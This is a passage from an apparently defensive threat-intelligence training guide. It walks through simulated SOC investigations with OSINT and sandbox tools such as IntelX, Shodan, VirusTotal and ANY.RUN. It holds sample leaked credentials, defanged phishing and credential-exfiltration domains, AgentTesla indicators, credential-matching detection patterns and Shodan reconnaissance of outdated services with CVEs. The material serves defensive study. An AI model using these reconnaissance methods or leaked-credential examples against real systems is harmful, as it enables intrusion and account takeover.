• Screenshot background and portal match internal VPN system
• IP used by attacker matches historical connection from Malaysia contractor during
contract period

MITRE ATT&CK Mapping:

• T1078: Valid Accounts

• T1583.006: Obtain Capabilities — Access Broker
• T1596: Search Open Websites/Dark Web
• T1082: System Information Discovery (shown in screenshots)

Step 3: Containment and Investigation

Immediate Actions:

• Disable [Link]@[Link] account in all systems

• Block all IPs tied to attacker login
• Rotate shared VPN gateway credentials if applicable
• Notify internal security team and HR for insider risk escalation

Hunt for Related Activity:

• Check for lateral movement attempts after login

• Review file shares, VPN logs and SSH/RDP audit logs
• Correlate timestamps with internal Git repo access and file transfer systems

Step 4: Reporting and Long-Term Response

Threat Intelligence Report Summary:

• Platform: SearchX
• Threat Type: Insider threat with dark web credential sale
• Threat Actor Alias: blackvault77
• IOC: Email, password, IP address, screenshot hash
• Source Forum: [Link]/forum/thread?id=1398
• Access Sold: Confirmed valid

Recommendations:

• Mandatory offboarding audit for all contractors

• Disable accounts within 1 day of last contract activity
• Implement Just-In-Time VPN access tied to zero-trust policy
• Continuous dark web monitoring for key assets and user accounts
INTELX (INTELLIGENCE X)

IntelX is a commercial search engine for the dark web and leaked datasets. It allows
analysts to search historic and live breaches, .onion services, WHOIS records and public
paste services.

Use Cases:

• Search for leaked documents, credentials, PII or proprietary code exposed on the
dark web.
• Investigate historical breach datasets involving internal users or third-party
vendors.
• Monitor for employee usernames and passwords appearing in recent breaches.
• Conduct due diligence on domains or companies seen in threat actor forums.

Practical Application: A cybersecurity team performs vendor risk assessments. Using

IntelX, they find credentials of one vendor’s staff exposed in multiple past breaches.
The finding prompts further review and security validation before onboarding the
vendor.

Scenario Simulation: Vendor Risk Validation Using IntelX

Context

• Event Type: Third-party vendor onboarding review

• Objective: Evaluate security hygiene of vendor before granting access to internal
systems
• Vendor: SecureCloudWare Ltd.
• Services: Provides remote IT administration tools for cloud resource provisioning
• Access Scope: SSH and API access to staging cloud environment

Step 1: Run Background Check Using IntelX

Tool Used: IntelX

Search Queries Performed:

• "@[Link]"
• "[Link]"
• "employee securecloudware"
• "site:[Link] +password +dump +2023"
• "filetype:xls OR filetype:csv securecloudware"
• "securecloudware admin password"
IntelX Results Overview

1. Credential Leak Results:

o Dumped Credential Set:
§ Email: daniel.h@[Link]
§ Password: Welcome2021!
§ Breach: sysadminportal_leak_2023
§ Date: 2023-11-14
o Email found in:
§ Hacked forums
§ Old public paste (Pastebin clone, expired now)
2. Other Employee Exposures:
o diane.r@[Link] – exposed in 2022 SaaS third-party vendor
dump
o Hash: 5f4dcc3b5aa765d61d8327deb882cf99 (weak MD5 format, reverse
reveals password)
3. Leaked Document:
o Filename: SecureCloudWare_InternalConfig2022.xlsx
o Detected via .onion mirror of dump site
o Tab: Infrastructure contains IP ranges, internal hostnames, SSH credentials
(partial)

Step 2: Threat Risk Validation and Classification

IntelX Tags Identified:

• Breach Source: Underground forum (formerly hosted on .onion)

• Data Type: Cleartext credentials, internal infrastructure
• Data Age: <2 years, still relevant
• Pastebin clone references matched keywords: "admin access" + "prod-servers"

Tactics Mapped to MITRE ATT&CK:

• T1589: Gather Victim Identity Information

• T1587.001: Obtain Capabilities — Valid Accounts
• T1586: Compromise Accounts
• T1040: Network Sniffing (from internal configuration tab)

Step 3: SOC Decision and Communication

SOC Recommendation:

• Reject full VPN/API access until vendor:

o Confirms incident response steps taken
 o Rotates all impacted passwords and SSH keys
o Implements MFA and credential monitoring
• Escalate to Procurement and Legal for inclusion in vendor onboarding policy
• Flag vendor in internal Third-Party Risk Register (TPRR)
PASTEBIN SCRAPER (GITHUB)

Pastebin Scraper is an open-source tool or script (available on GitHub) used to monitor

Pastebin for sensitive data leaks such as credentials, PII, internal documents or malware
code snippets.

Use Cases:

• Monitor for newly posted pastes containing keywords like internal IPs, corporate
emails or customer data.
• Automate scraping and alerting when a specific keyword or pattern is detected in a
public paste.
• Identify early signs of data exposure before they appear in breach notification sites.
• Hunt for malware command snippets, exploit code or phishing kits being shared
publicly.

Practical Application: An organisation implements a Pastebin Scraper configured with

internal domain and IP patterns. One alert detects a paste containing admin
credentials for an internal staging server, posted anonymously. This triggers an
emergency response and password rotation.

Scenario Simulation: Internal Credential Leak Detected via Pastebin Scraper

Context

• Event Type: Proactive data leak monitoring

• Organisation: FinBank Group
• Assets at Risk: Internal staging servers, developer accounts
• Tool: Pastebin Scraper configured from open-source GitHub project
• Monitoring Rule: Regex pattern for @[Link], internal IP ranges 10.88.*.*,
staging-finbank and common credential syntax (e.g. username:password)

Step 1: Configuration of Pastebin Scraper

Script Setup:

• Deployed on internal VM (Ubuntu)

• Set to run every 10 minutes using cron
• Python script with following logic:
o Scrape most recent pastes (RSS/API or HTML if API limited)
o Extract keywords using regular expressions
o Send alert via Slack webhook if match is found

Monitored Patterns:
 • "@[Link]"
• "10.88."
• "staging-finbank"
• "username:.*"
• "password:.*"

Step 2: Alert Triggered

Paste Detected:

• Timestamp: 2025-08-05 09:31 UTC

• Paste Title: DevTestCreds - shared for review
• Paste Snippet:

[Link]
user_admin@[Link]
password: SecureDev@123
[Link]

• Paste URL: [Link]

Alert Message Sent to Slack Channel #cyber-incident-monitoring:

Keyword match detected in Pastebin:

Potential leaked staging credentials for domain [Link]
Paste URL: [Link]
Timestamp: 2025-08-05 09:31 UTC

Step 3: SOC Investigation and Response

SOC Action Plan:

1. Validate Exposure:
o Access the paste (if still public)
o Confirm it contains internal usernames and passwords
2. Asset Owner Notified:
o Notify DevOps lead managing [Link]
o Confirm whether credentials are active
3. Immediate Remediation:
o Disable exposed account user_admin@[Link]
o Rotate password for staging access and SSH keys
o Reimage the internal VM hosting [Link] if breach is suspected
4. Forensic Analysis:
 o Search internal logs (Sysmon, Auth logs, Firewall) for any activity from the
paste timestamp onwards
o Look for failed/successful logins using the leaked credentials

Step 4: Timeline and Reporting

Time Action
09:31 UTC Pastebin Scraper detects suspicious paste
09:33 UTC Slack alert triggered and received by SOC
09:40 UTC SOC confirms credential exposure
10:00 UTC Internal accounts disabled and passwords rotated
10:15 UTC Post-incident log analysis started
12:00 UTC Incident documented in internal IR tracking system
14:00 UTC Findings shared with CISO and DevSecOps leadership

Practical Outcome

• Data Exposure Prevented: No confirmed access attempts using exposed

credentials
• Detection Time: < 10 minutes from paste creation
• Tool Impact: Pastebin Scraper enabled proactive detection and rapid remediation
• Policy Update: Added requirement for password obfuscation in development
sharing practices
3. DOMAIN, IP AND URL INVESTIGATION
VIRUSTOTAL

VirusTotal is a widely-used malware detection and URL/domain investigation platform that

aggregates the output of multiple antivirus engines, sandbox tools and URL scanners. It
provides reputation scores, behavioural analysis and file metadata.

Use Cases:

• Investigate whether a file hash, IP address, domain or URL has been flagged as
malicious.
• Review the historical relationship between a domain and associated files,
communications or hosting infrastructure.
• Use the graph feature to map infrastructure and malware relationships.
• Integrate with SIEM to auto-enrich alerts with threat intelligence.

Practical Application: An analyst finds a suspicious URL in a phishing email. They

paste it into VirusTotal and discover multiple engines flag it as malicious, with
evidence of redirection to a credential-harvesting page. The analyst blocks the
domain and updates email filters.

Scenario Simulation: Phishing URL Investigation with VirusTotal

Context

• Event Type: Suspicious Email Alert

• Target: Employee in Finance Department
• Tool: VirusTotal Web Interface and Graph
• Objective: Determine whether a link in the email is malicious and assess its threat
context

Step 1: Alert Triggered by Email Gateway

• The secure email gateway flags a message sent to [Link]@[Link] with

the subject line Urgent: Payment Request Attached
• The email contains a shortened URL: hxxps://bit[.]ly/3F1nance-Invoice
• The link redirects to hxxps://secure-check[.]online/[Link]

Step 2: Analyst Investigates with VirusTotal

Search Query:
 • The analyst pastes [Link] into VirusTotal
under the "URL" tab.

VirusTotal Result Summary:

• Detection Ratio: 28/90 engines flag the URL as phishing

• Tags: phishing, credential harvest, redirect, suspicious domain
• Final Redirect Location: [Link]
• Community Comments: Several users confirm the URL is part of a widespread
phishing campaign targeting finance departments

Step 3: Use of VirusTotal Graph for Relationship Mapping

• Analyst clicks on the Graph tab

• VirusTotal displays:
o Associated domains hosted on same IP: login-mail-auth[.]online,
outlookinvoice[.]com
o Shared file hashes uploaded to VirusTotal from the domain
o SSL certificate reuse across phishing sites
o WHOIS details showing a common registrant for 6 related domains

Step 4: Analyst Actions

Immediate Actions:

• Block the domain [Link] and its redirect destination at the firewall,
proxy and DNS layers
• Submit all related URLs and IPs to email filtering system (e.g. Proofpoint) for
blacklisting

IOC Extraction and Sharing:

• Extract the following IOCs from VirusTotal:

o Malicious URLs
o Hosting IP: [Link]
o File hash: e8f764ddf2aab1f877d1ab1c7e97cf09
• Share these IOCs with other SOC teams and upload to internal threat intel platform

SIEM Correlation:

• Run a retrohunt in SIEM to check if other users clicked similar URLs

• No other hits found, confirming incident is contained to one target

Step 5: Timeline of Incident

Time Action
09:00 Email alert triggered by secure gateway
09:05 Analyst begins URL investigation using VirusTotal
09:07 VirusTotal flags URL as phishing with 28 engines
09:10 Graph shows infrastructure linked to a known phishing group
09:15 Domain and IP blocked at all network layers
09:20 SIEM retrohunt confirms no additional compromise
09:45 IOCs documented, shared and added to internal threat feed
[Link]

[Link] is a powerful tool for scanning and analysing the behaviour of websites. It
provides screenshots, network requests, redirect chains, JavaScript execution logs and
more, enabling analysts to assess suspicious or unknown URLs.

Use Cases:

• Analyse how a URL behaves when loaded in a browser, including redirects, scripts
and embedded content.
• Identify phishing sites or malware delivery pages that mimic legitimate websites.
• Investigate domains sent via SMS, WhatsApp or email to verify their safety.
• Detect command-and-control beaconing or dropper links in campaigns.

Practical Application: A user reports receiving a suspicious shortened URL via

WhatsApp. The analyst submits it to [Link] and sees that it redirects to a fake
banking site with login fields. The phishing page is taken down and users are warned.

Scenario Simulation: Investigating a Suspicious Link with [Link]

Context

• Event Type: User-reported suspicious link received via WhatsApp

• Target: Employee in Customer Service Department
• Tool: [Link]
• Objective: Analyse redirection behaviour, site appearance and embedded scripts to
determine if the URL is phishing

Step 1: User Submits Security Report

• An employee receives a message via WhatsApp stating:

"Please verify your bank login to avoid account suspension. Click here:
hxxps://bit[.]ly/banking-verify"
• The user reports it through the internal phishing reporting form.

Step 2: Analyst Prepares for URL Analysis

• Analyst extracts and sanitises the URL:

o Shortened URL: hxxps://bit[.]ly/banking-verify
• Prepares to submit it to [Link]

Step 3: Submitting to [Link]

• Analyst enters the full URL into [Link].

 • Selects "Public Scan" with JavaScript rendering enabled.
• Submits and waits for analysis to complete.

Step 4: [Link] Results

Key Findings:

• Final redirected URL: hxxps://secure-login[.]mybank-authenticate[.]com/login

• HTML title: MyBank Online Services
• Page screenshot: Visually identical to the legitimate [Link] login portal
• Embedded form action: Sends credentials to api[.]stealcreds[.]xyz
• TLS certificate: Self-signed, not issued by a trusted CA
• Detected third-party trackers and suspicious JavaScript attempting to capture
keystrokes

Network Requests:

• Multiple GET/POST requests to:

o stealcreds[.]xyz
o session-update[.]cn
• All domains are newly registered and have no historical reputation

Indicators:

• Domain age: 2 days

• Hosted in a VPS provider with no reverse DNS
• Whois shows privacy-protected registration

Step 5: Analyst Actions

Immediate Remediation:

• Add all identified domains to URL filtering and DNS blocking policies
• Submit phishing site to domain registrar and takedown services
• Notify banking partner of impersonation attempt

Communication:

• Notify all employees via internal bulletin:

o Message warning of ongoing smishing campaign using banking lures
o Instruct users not to click shortened links from WhatsApp or SMS

IOC Sharing:
 • Extracted IOCs:
o Final URL: hxxps://secure-login[.]mybank-authenticate[.]com/login
o Shortlink: hxxps://bit[.]ly/banking-verify
o Malicious endpoint: api[.]stealcreds[.]xyz
• IOCs shared with external ISAC and uploaded to internal threat feed

Step 6: Timeline
Time Action
10:30 User reports suspicious WhatsApp message
10:35 Analyst submits URL to [Link]
10:38 Scan completes showing fake banking site
10:40 IOC list compiled, URLs blocked at proxy
10:50 Phishing takedown request submitted
11:00 Internal advisory published to all staff
SHODAN

Shodan is a search engine for discovering internet-connected devices and services. It

allows users to identify exposed assets, open ports, banners, SSL certs and potential
vulnerabilities.

Use Cases:

• Investigate if a domain or IP is hosting exposed services like RDP, SMB or outdated

web servers.
• Perform external attack surface analysis for your organisation or third-party
vendors.
• Detect devices with default credentials or weak configurations.
• Monitor for assets exposing sensitive ports or misconfigured services.

Practical Application: An internal red team submits a domain to Shodan and discovers
it is linked to an old server running an outdated Apache version exposed to the
internet. This leads to patching and reconfiguration by the infrastructure team.

Scenario Simulation: Finding Exposed Services with Shodan

Context

• Event Type: External asset risk assessment

• Target: Internal legacy server hosting a deprecated portal
• Tool: Shodan ([Link]
• Objective: Identify internet-facing services and detect outdated or misconfigured
software

Step 1: Analyst Defines the Target

• The internal red team is conducting an asset discovery and decides to audit an old
subdomain:
[Link]
• They resolve the domain to an IP address: [Link]

Step 2: Using Shodan for Reconnaissance

• Analyst inputs the IP address into Shodan's search bar

• Shodan returns a detailed summary of all banners, services, ports and metadata
publicly accessible from the IP

Step 3: Shodan Results

Key Observations:

• Ports Open: 22 (SSH), 80 (HTTP), 443 (HTTPS)

• Banner on Port 80:
o Server: Apache/2.2.15 (CentOS)
o Last Updated: 2014
• SSL Certificate:
o Self-signed
o Common Name: *.[Link]
• Additional Metadata:
o Page title: “Company HR Portal”
o Exposed Directory Listing Enabled
• SSH Banner:
o OpenSSH 5.3
o Suggests potential compatibility with CVE-2016-0777 (remote info leak)

Step 4: Risk Interpretation

Attack Surface Findings:

• The server is exposed on the internet with outdated software

• Apache version is vulnerable to multiple known exploits (e.g., CVE-2017-3167)
• Use of default or self-signed certificates on external-facing assets
• Sensitive internal hostnames ([Link]) exposed in SSL certificate
• Potential risk of information disclosure through open directory listings

Step 5: Actions Taken

Immediate Mitigation:

• Security team contacts the infrastructure team to:

o Take the server offline or place it behind a reverse proxy
o Patch Apache and OpenSSH to the latest versions
o Replace self-signed certificates with trusted CA-signed certs
o Disable directory listing

Long-Term Response:

• Update internal asset inventory to flag legacy servers

• Enforce vulnerability scans and port audits as part of monthly operations
• Schedule full penetration test to ensure proper segmentation and zero external
exposure of internal services

Documentation:
 • Save full Shodan scan result as part of vulnerability assessment record
• Link relevant CVEs (e.g., CVE-2017-3167, CVE-2016-0777) in ticketing system

Step 6: Timeline
Time Action
09:10 Red team initiates Shodan lookup for legacy domain
09:15 Discovery of outdated Apache server and open ports
09:30 Infrastructure team notified, service pulled behind VPN
10:00 Certificates regenerated and host removed from internet-facing scope
CENSYS

Censys is an internet-wide scanning platform that profiles hosts and websites, exposing
TLS/SSL certificate data, open ports, banners and service metadata. It’s used to monitor
external infrastructure and discover hidden assets.

Use Cases:

• Search for domains or IPs associated with your organisation’s certificates.

• Identify rogue or shadow IT infrastructure exposed on the internet.
• Investigate SSL cert misconfigurations or use of deprecated ciphers.
• Perform competitor research or profile threat actor infrastructure.

Practical Application: An analyst queries Censys using the organisation’s wildcard

certificate. The search reveals an untracked staging environment hosted in another
region, which was not recorded in asset inventory. The system is taken under
management and secured.

Scenario Simulation: Discovering Shadow IT with Censys

Context

• Event Type: Asset discovery and external risk assessment

• Objective: Uncover unknown or untracked internet-facing services using TLS
certificate data
• Tool: Censys ([Link]

Step 1: Define the Query

The security team wants to audit all external assets that use the wildcard certificate
*.[Link].

They navigate to Censys and input the search query:

[Link]: "*.[Link]"

This returns any TLS/SSL certificate where *.[Link] or its subdomains are
present in the certificate’s SAN (Subject Alternative Name) field.

Step 2: Censys Returns the Following Results

Result List Includes:

1. [Link] — known production app

2. [Link] — expected
 3. [Link] — unknown
4. [Link] — known, but expected to be internal only

Step 3: Deep Dive on Unknown Entry

Focusing on [Link]:

• Censys shows:
o Hosted in Tokyo AWS region
o TLS cert: valid wildcard cert *.[Link]
o Ports open: 80, 443, 22
o Banner on port 80: “Staging API Server – Version 1.3”
o TLS cipher suite: Deprecated TLS_RSA_WITH_3DES_EDE_CBC_SHA
o Self-reported server header: nginx/1.14.0
• Reverse DNS and WHOIS lookup indicate the server was set up 4 months ago

Step 4: Risk Assessment

Identified Issues:

• No entry for this host in central CMDB or asset inventory

• Exposes production wildcard cert in staging
• Weak TLS configuration still in use
• SSH open to the internet

Step 5: Action and Containment

Immediate Actions:

• Infrastructure team contacted to verify legitimacy

• Staging server access restricted to VPN only
• TLS cipher suite upgraded
• Host added to inventory and included in vulnerability scans

Root Cause:

• A regional dev team launched the server without following onboarding process

Step 6: Long-Term Measures

• Enforce centralised certificate issuance and usage logging

• Integrate Censys with weekly asset discovery automation
• Create a rule in SIEM to flag new external-facing domains linked to
*.[Link]
• Issue awareness memo to developers on external exposure and TLS risks
ROBTEX

Robtex provides DNS, IP, domain and routing information to track the relationships
between infrastructure elements. It helps identify co-hosted domains, passive DNS
entries, reverse lookups and other technical metadata.

Use Cases:

• Investigate domain relationships, including A records, MX records, NS records and

WHOIS.
• Track multiple phishing domains hosted on the same IP.
• Discover infrastructure overlaps between different malicious campaigns.
• Support threat actor infrastructure attribution.

Practical Application: While investigating a domain linked to a phishing site, the

analyst uses Robtex to find that multiple scam domains point to the same IP. This
shared infrastructure is reported, blocked and logged in the threat intel repository.

Scenario Simulation: Tracking Phishing Infrastructure Using Robtex

Context

• Event Type: Phishing investigation

• Objective: Identify if multiple malicious domains share infrastructure (e.g. IP
address)
• Tool: Robtex ([Link]

Step 1: Initial Trigger

• A user reports receiving a phishing email pretending to be from secure-

payments[.]com.
• The analyst checks the embedded link: [Link]

Step 2: Robtex Domain Investigation

The analyst enters [Link] into Robtex.

Robtex reveals:

• A Record: [Link]
• Hosting ISP: ShadowHosting LLC
• Other domains pointing to the same IP:
o login-safe-banking[.]com
o verifybankingaccess[.]com
 o my-appleid-confirm[.]com
• MX Record: No email services configured
• WHOIS: Recently registered, no known organisation

Step 3: Reverse Lookup and Passive DNS

Using Robtex:

• Reverse IP lookup shows multiple phishing domains using the same IP.
• Passive DNS shows that in the last 14 days, domains have changed frequently but
always resolve to [Link].

Step 4: Threat Attribution

Robtex DNS graph view helps map the following:

• All domains linked to the same /24 IP range

• Similar TTL values and DNS provider
• Registered through the same registrar with privacy protection

This pattern matches known threat actor behaviour involving fake banking domains.

Step 5: Response Actions

SOC Actions:

• All discovered domains and IPs are blocked at firewall and email gateway
• IOC list updated in threat intelligence platform
• A SOAR playbook is executed to automate further detection of these patterns

Threat Intelligence Team:

• Tags the infrastructure as "Financial Phishing Cluster Alpha"

• Submits intelligence to partners and threat feeds

Step 6: Automation Recommendation

The SOC team decides to:

• Integrate Robtex API with SIEM to enrich any domain alerts

• Flag alerts for any domain resolving to [Link]/24 for review
[Link]

[Link] offers a suite of tools for DNS analysis, IP geolocation, WHOIS lookup, ASN
queries and DNS propagation testing. It helps analysts inspect and validate domain
infrastructure quickly.

Use Cases:

• Perform WHOIS lookups to determine domain ownership and registration timelines.

• Identify geolocation and ASN of hosting IP addresses.
• Check DNS records for suspicious domains or subdomains.
• Use reverse WHOIS to find other domains registered by the same email.

Practical Application: A newly registered domain flagged in spam filters is

investigated using [Link]. The WHOIS data shows it was registered using a
known threat actor's email and shares a hosting ASN with previously known phishing
sites.

Scenario Simulation: Infrastructure Attribution Using [Link]

Context

Event Type: Suspicious domain detection from email filters

Objective: Use [Link] to analyse a flagged domain, identify related malicious
infrastructure
Tool: [Link]

Step 1: Alert Trigger

A spam filter flags an inbound phishing email. The email contains a suspicious link:

[Link]

SOC Analyst extracts domain:

[Link]

Step 2: WHOIS Lookup with [Link]

Action: Navigate to [Link]

Input: [Link]

[Link] Output:
 • Registrant Email: admin@[Link]
• Registrar: NameSilo, LLC
• Registered On: 2025-07-25
• Last Updated: 2025-07-26
• Name Servers: [Link], [Link]
• Status: clientTransferProhibited

Email domain [Link] is linked to prior malicious registrations. The creation date is
recent and suspicious.

Step 3: Reverse WHOIS Search

Action: Navigate to [Link]

Input: admin@[Link]

Output:

• [Link]
• secure-banking247[.]com
• applelogin-auth[.]net
• mailbox-recovery[.]xyz
• All domains registered in the last 60 days

This email is linked to multiple phishing-style domains, all mimicking legitimate services.

Step 4: ASN and IP Geolocation Analysis

Action: Use [Link] and [Link]

IP Analysis:

• IP: [Link]
• ASN: 208046 (AS-DELIS, Russia)
• Hosting Org: Global Layer

The domain is hosted in a known bulletproof hosting ASN used in prior phishing
campaigns.

Step 5: DNS Record Inspection

Action: Navigate to [Link]

Input: [Link]

Output:
 • A Record: [Link]
• MX Record: [Link]
• TXT Record: No SPF configured

Domain is live with email receiving enabled, likely for phishing reply or credential capture.

Step 6: Threat Attribution and Response

IOC Summary:

• Domain: [Link]
• Email: admin@[Link]
• IP: [Link]
• ASN: 208046

Response:

• Block domain and IP in proxy, firewall and email gateway

• Tag all domains linked to admin@[Link] as high-risk
• Report findings to threat intel platform
• Add domain and IP to IOC watchlist
• Initiate detection rule update for similar domain patterns

Step 7: Automation Recommendation

• Integrate ViewDNS API to:

o Auto-enrich suspicious domains in SIEM
o Perform WHOIS checks and reverse WHOIS lookups on alert
o Alert on any newly seen domains registered with known threat actor emails
or ASNs
HYBRID ANALYSIS

Hybrid Analysis is a malware sandbox platform that can also analyse URLs and files. It
provides dynamic behavioural analysis, network traffic, file system activity and threat
scoring.

Use Cases:

• Submit a suspicious URL to see what it does when executed or opened.

• Observe HTTP requests, dropped files or redirects from the domain.
• Enrich threat reports with behavioural analysis.
• Cross-reference URL activity with MITRE ATT&CK TTPs.

Practical Application: An unknown URL embedded in an email attachment is

submitted to Hybrid Analysis. The scan shows the URL drops a malicious JavaScript
payload and attempts to contact a C2 server. This finding confirms weaponisation and
triggers incident response.

Scenario Simulation: Behavioural Analysis Using Hybrid Analysis

Context

Event Type: Suspicious email attachment investigation

Objective: Identify if embedded URL is weaponised and attempts malware delivery
Tool: Hybrid Analysis

Step 1: Suspicious Email Investigation

SOC team receives a reported email with the following details:

• Subject: “Action Required – Email Quarantine Notification”

• Body contains a button:

Review Message
[Link]

Analyst extracts the embedded URL:

[Link]

Step 2: Submit URL to Hybrid Analysis

Action:
 • Navigate to: [Link]
• Click on “Submit Sample”
• Select “Submit URL”
• Input:
[Link]
• Select environment: Windows 10 64-bit, Adobe Reader, Office, etc.
• Enable internet connectivity for live behaviour tracking

Submission ID:

Sample ID: HYA-2025-31342-xyz

Step 3: Observe Dynamic Analysis Results

After a few minutes, Hybrid Analysis completes execution and provides a full behavioural
profile.

Output:

Summary Score:
Malicious (95/100)

Indicators Identified:

1. File Drop:
o [Link] written to %AppData%\Roaming\
o SHA256:
da7c3d89bf192eaeef20387d881b2357c2116fcb13f6ec32fae0171efc111efa
2. Network Connections:
o Outbound HTTP POST to [Link]
o Resolves to same C2 used in secure-banking247[.]com campaign
3. Process Injection:
o [Link] spawns [Link] with obfuscated Base64 payload
4. MITRE ATT&CK Mapping:
o T1059.001 (PowerShell)
o T1071.001 (Web Protocols)
o T1204.001 (Malicious Link in Email)
5. Malware Family:
o Behaviours match AgentTesla loader pattern

Step 4: Malware Analysis

Dropped File Analysis:

 • Upload [Link] to VirusTotal and ThreatFox
• Found in multiple recent campaigns tagged as AgentTesla
• Config includes email exfiltration to [Link][.]ru

Persistence Not Observed:

Session was short and run in isolated environment — no registry key persistence set.

Step 5: Response Actions

SOC Actions:

• Block domain [Link] and IP [Link]

• Add hash da7c3d89bf... to EDR/AV blacklist
• Check proxy logs for any user activity to that domain
• Trigger SOAR playbook: phishing link + JS payload detection
• Hunt for execution of [Link] with obfuscated arguments in logs

IR Actions:

• Inspect endpoints with connection attempts to the C2 server

• Quarantine machines executing PowerShell via WScript

Threat Intelligence Actions:

• Add all IOCs to threat feed: URL, hash, domain, IP, TTPs
• Correlate with prior incidents involving AgentTesla variant

Step 6: Automation Recommendation

Integrate Hybrid Analysis API to:

• Auto-submit unknown URLs extracted from email body

• Fetch behavioural summary and alert if:
o File drop observed
o Network connection to known malicious ASN
o MITRE ATT&CK mapping indicates weaponisation
[Link]

[Link] is an interactive malware analysis sandbox that allows live tracking of malware
behaviour, file drops, network communications and C2 activity. It also supports dynamic
URL analysis.

Use Cases:

• Dynamically run a suspicious URL or domain to observe redirects, downloads and

traffic.
• Investigate drive-by download campaigns or malvertising pages.
• Monitor network indicators such as IPs and DNS queries generated by the domain.
• Capture session behaviour for phishing or fake login pages.

Practical Application: An analyst runs a suspicious URL from a reported email inside
[Link]. The analysis reveals it mimics an Office365 login page and captures
credentials entered into the form, confirming it as a phishing site.

Scenario Simulation: Interactive Phishing Site Analysis Using [Link]

Context

Event Type: Phishing site analysis

Objective: Confirm malicious behaviour of a suspicious login page
Tool: [Link]

Step 1: User Report and IOC Extraction

A user reports receiving a suspicious email with a login request impersonating Office 365.
The email body contains:

“Your account has been locked due to unusual sign-in activity. Please verify to restore
access.”

[Verify Now]
[Link]

IOC for analysis:

[Link]

Step 2: Submit URL to [Link] for Interactive Analysis

Action:
 • Go to: [Link]
• Create a free account (if not already logged in)
• Click “New Task”
• Select URL and paste:

[Link]

• Choose environment:
o Windows 10 x64
o Office/Adobe enabled
o Network capture enabled
• Click Run (interactive session begins)

Step 3: Execution and Observation

Live session findings:

1. Page Rendered:
o Looks like a clone of Office365 login portal
o Includes company logo loaded from CDN
o Custom JavaScript mimics login form submission
2. Form Capture Behaviour:
o Analyst types test credentials: test_user@[Link] / Test1234
o On submit, JavaScript logs credentials and sends POST request to:

[Link]

3. Network Indicators:
o DNS query for postdata-login365[.]com
o Outbound HTTPS POST to IP [Link]
o No certificate validation on the server
4. MITRE ATT&CK Mapping:
o T1566.002 (Phishing: Spearphishing Link)
o T1056.001 (Input Capture: Keylogging via fake form)
o T1071.001 (Exfiltration over HTTPS)
5. Artifacts Captured:
o Screenshot of phishing page
o PCAP file showing credential exfiltration
o HAR file with browser session details

Step 4: IOC Extraction from [Link]

Extracted from session:

 • URL: [Link]
• Phishing collector: [Link]
• IP: [Link]
• Domain similarity: Matches pattern from previously known phishing campaigns (e.g.
[Link])

Step 5: Response Actions

SOC Actions:

• Add [Link] and [Link] to deny list in

DNS/firewall/email gateway
• Block associated IP [Link] across proxy, firewall and endpoint tools
• Alert any users who accessed the domain via proxy logs
• Trigger phishing containment playbook

Threat Intelligence Actions:

• Add all IOCs to internal threat database

• Tag domain under "Office365 Credential Harvesting Campaign"
• Cross-reference domains with Robtex and ViewDNS for infrastructure reuse

Step 6: Automation Recommendation

Integrate [Link] API with email gateway or phishing analysis queue:

• Automatically submit URLs flagged as suspicious

• Extract network activity and credential exfil endpoints
• Use PCAP output for automated IOC generation and correlation in SIEM
THREATMINER

ThreatMiner is an OSINT and threat intelligence repository that allows users to search for
IOCs (domains, IPs, file hashes, URLs) and view their historical associations and campaign
metadata.

Use Cases:

• Look up domain or IP associations with malware families or threat groups.

• Discover historical passive DNS entries.
• Identify shared infrastructure between malicious campaigns.
• Use collected metadata in automated enrichment pipelines.

Practical Application: A domain involved in a credential theft campaign is submitted

to ThreatMiner. The results show it has previously been linked to other AgentTesla
samples and was used in campaigns dating back to 2022. The analyst blocks all
related infrastructure.

Scenario Simulation: Threat Campaign Attribution Using ThreatMiner

Context

Event Type: Credential Theft Investigation

Objective: Identify whether a suspicious domain is part of a known malware campaign
Tool: ThreatMiner

Step 1: Initial IOC Submission

An alert is generated by the email security gateway flagging outbound credentials

submitted to the following URL:

[Link]

The security team suspects this domain is part of a credential harvesting campaign but
needs further context.

Step 2: Search the Domain on ThreatMiner

Action:

• Go to: [Link]
• Input: [Link] into the search bar
• Choose Domain from the drop-down menu
Step 3: ThreatMiner Output

ThreatMiner returns the following data:

1. Passive DNS History:

o Domain previously resolved to:
§ [Link] (Dec 2023)
§ [Link] (Apr 2024)
o Multiple short-lived IPs used
2. Malware Association:
o Domain associated with:
§ AgentTesla samples (MD5: d7f3b728e236472ddda4a9319f59cb2a)
§ Phishing campaigns targeting email providers
o Found in open-source YARA rule matches related to credential stealers
3. Campaign Tagging:
o Linked to “AgentTesla-PhishCluster-2023-Q4”
o Campaign tracked by multiple sources since October 2023
4. WHOIS Info:
o Created using privacy registrar
o Registered in November 2023
o TTL changes match other domains in same campaign
5. Related Infrastructure:
o Other domains found with shared SSL cert fingerprint:
§ webmail-reset-login[.]info
§ securemsg-gateway[.]org

Step 4: IOC Extraction

IOCs Identified:

• Domain: [Link]
• Related Domains:
o [Link]
o [Link]
• Malware: AgentTesla
• Hash: d7f3b728e236472ddda4a9319f59cb2a
• IPs:
o [Link] (internal test IP used in sandbox)
o [Link]

Step 5: Response Actions

SOC Actions:
 • Block all listed domains and IPs across the firewall, proxy and endpoint protection
• Perform retroactive search across proxy/DNS logs to identify any previous access
• Correlate identified file hash with endpoint telemetry to detect local infections
• Enrich SIEM correlation rules with the newly identified domains and IPs

Threat Intel Team:

• Update threat intel platform with all IOCs

• Tag infrastructure with "AgentTesla Campaign"
• Notify partner organisations via intelligence-sharing groups

Step 6: Automation Recommendation

Enhancement Plan:

• Use ThreatMiner’s API to automate enrichment of domains or IPs flagged in email

and proxy logs
• Schedule daily IOC lookups and campaign tagging reports
• Automatically flag suspicious domains in SIEM if they appear in known malware
infrastructure clusters
4. SANDBOX AND MALWARE BEHAVIOURAL
ANALYSIS
[Link]

[Link] is a cloud-based interactive sandbox for malware and URL analysis. It allows
analysts to dynamically interact with a live malware sample or suspicious URL in real time,
observing system behaviour, process trees, file creation, registry modifications and
network traffic.

Use Cases:

• Analyse phishing attachments or suspicious files by executing them in a controlled

environment.
• Dynamically observe malware behaviour such as command and control (C2)
beaconing, credential harvesting or file encryption.
• Identify dropped files, initiated processes and registry modifications.
• Trace execution flow of malicious scripts, macro-based malware and exploits.
• Investigate URLs embedded in documents or emails to detect redirects and
payload delivery.

Practical Application: A user reports an Excel file received via email. The analyst
uploads the file to [Link] and enables macro execution. The sandbox reveals that
the file spawns PowerShell, downloads a second-stage binary and attempts to
connect to a known malware C2 IP. The findings confirm it is a loader.

Scenario Simulation: Analysing a Suspicious Excel File Using [Link] (Sandbox and
